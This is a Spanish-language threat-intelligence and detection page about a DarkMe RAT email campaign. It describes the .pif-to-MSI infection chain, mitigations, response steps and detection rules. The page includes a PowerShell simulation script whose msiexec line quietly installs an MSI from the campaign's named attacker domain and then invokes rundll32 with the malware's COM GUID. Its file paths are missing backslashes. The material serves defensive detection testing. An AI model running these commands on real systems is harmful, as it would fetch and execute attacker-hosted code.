La Campaña de Email DarkMe Amplía el Objetivo en Ataques APT RAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Se ha observado una nueva campaña que entrega el spyware-RAT DarkMe dependiendo de la ingeniería social en lugar de exploits de software. Los atacantes distribuyen un .pif archivo a través de correo electrónico, que inicia una cadena de infección multietapa involucrando MSIEXEC y varios cargadores basados en VB6. El alejamiento de la explotación de día cero hacia la ingeniería social de alto volumen sugiere un cambio hacia métodos de ataque más económicos, amplios y menos selectivos.
Investigación
Huntress identificó la campaña tras detectar un .pif archivo que lanza Windows Installer para recuperar un paquete MSI remoto. El análisis descubrió una compleja cadena multietapa que involucra un script de preparación llamado prnfig.wsf, importaciones de registro y ejecución de un objeto COM a través de rundll32.exe /sta. La etapa final utiliza vaciado de proceso para inyectar la carga de DarkMe en el binario firmado de Microsoft clspack.exe.
Mitigación
Los defensores deben monitorear rundll32.exe lanzado con la bandera /sta y un GUID sin una ruta DLL acompañante. Los equipos de seguridad también deben detectar msiexec recuperando paquetes MSI remotos a través de HTTPS e investigar la ejecución de .pif archivos. Los binarios firmados de Microsoft que se ejecutan desde ubicaciones inusuales como %AppData% deben recibir un escrutinio adicional.
Respuesta
Cuando se detecta actividad sospechosa, aísle inmediatamente el punto final afectado para interrumpir la comunicación C2 y prevenir la exfiltración de datos. Termine el proceso clspack.exe vacío y elimine los artefactos maliciosos de %AppData%ComponentsFolder and %AppData%Microsoft. Elimine la persistencia creada a través del manejador del protocolo de URL personalizado y la clave HKCU Run . Restablezca las credenciales de usuario afectadas y trate cualquier billetera de criptomonedas almacenada localmente como potencialmente comprometida.
Flujo de ataque
Todavía estamos actualizando esta parte.
Detecciones
Posibles Puntos de Persistencia [ASEPs – Colmena de Software/NTUSER] (vía evento de registro)
Extensión Inusual de Binario Ejecutable (vía creación de proceso)
LOLBAS WScript / CScript (vía creación de proceso)
Posible Intento de Instalación de Archivo MSI Remoto (vía línea de comandos)
Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)
IOCs (HashSha256) para detectar: La campaña de correo electrónico DarkMe amplía el objetivo para APT RAT
IOCs (SourceIP) para detectar: La campaña de correo electrónico DarkMe amplía el objetivo para APT RAT
IOCs (DestinationIP) para detectar: La campaña de correo electrónico DarkMe amplía el objetivo para APT RAT
Detectar Comunicación C2 y Dominio de Preparación para DarkMe RAT [Conexión de Red de Windows]
Detección de Actividades de la Campaña Maliciosa de DarkMe RAT [Creación de Proceso de Windows]
Ejecución de Simulación
-
Narrativa de Ataque y Comandos: El adversario apunta a desplegar el DarkMe RAT para mantener la persistencia. Para evadir la detección basada en firmas, el atacante utiliza
msiexecpara extraer una carga útil remota desde un dominio comprometido (onlineview365.com). Tras la infección inicial, el atacante utilizarundll32.exepara invocar un objeto COM específico a través de un GUID para ejecutar código en memoria, y posteriormente usacmd.exepara importar configuraciones de registro desde un archivo de texto para preparar el entorno para una ejecución de carga útil basada enwscript.exe. -
Script de Prueba de Regresión:
# Script de Simulación de DarkMe RAT # Este script simula las líneas de comando exactas definidas en la regla Sigma. Write-Host "[+] Iniciando Simulación de DarkMe RAT..." -ForegroundColor Cyan # 1. Simular descarga remota de msiexec Write-Host "[*] Simulando descarga remota de msiexec..." Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue # 2. Simular ejecución de objeto COM de rundll32 Write-Host "[*] Simulando ejecución de COM de rundll32..." Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue # 3. Simular importación de registro de cmd.exe Write-Host "[*] Simulando importación de registro de cmd.exe..." $tempFile = "$env:TEMPfiletext2.txt" "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait # 4. Simular ejecución de wscript.exe a través de la cadena padre cmd/rundll32 Write-Host "[*] Simulando ejecución de wscript.exe desde AppData..." $scriptPath = "$env:APPDATAmalicious_script.vbs" "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii # Para desencadenar la regla específica padre/hijo: # Padre: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} # Hijo: wscript.exe %AppData%malicious_script.vbs Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait Write-Host "[+] Simulación Completa." -ForegroundColor Green -
Comandos de Limpieza:
# Limpiar Artefactos de Simulación Write-Host "[+] Limpiando..." -ForegroundColor Yellow Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue Write-Host "[+] Limpieza Finalizada." -ForegroundColor Green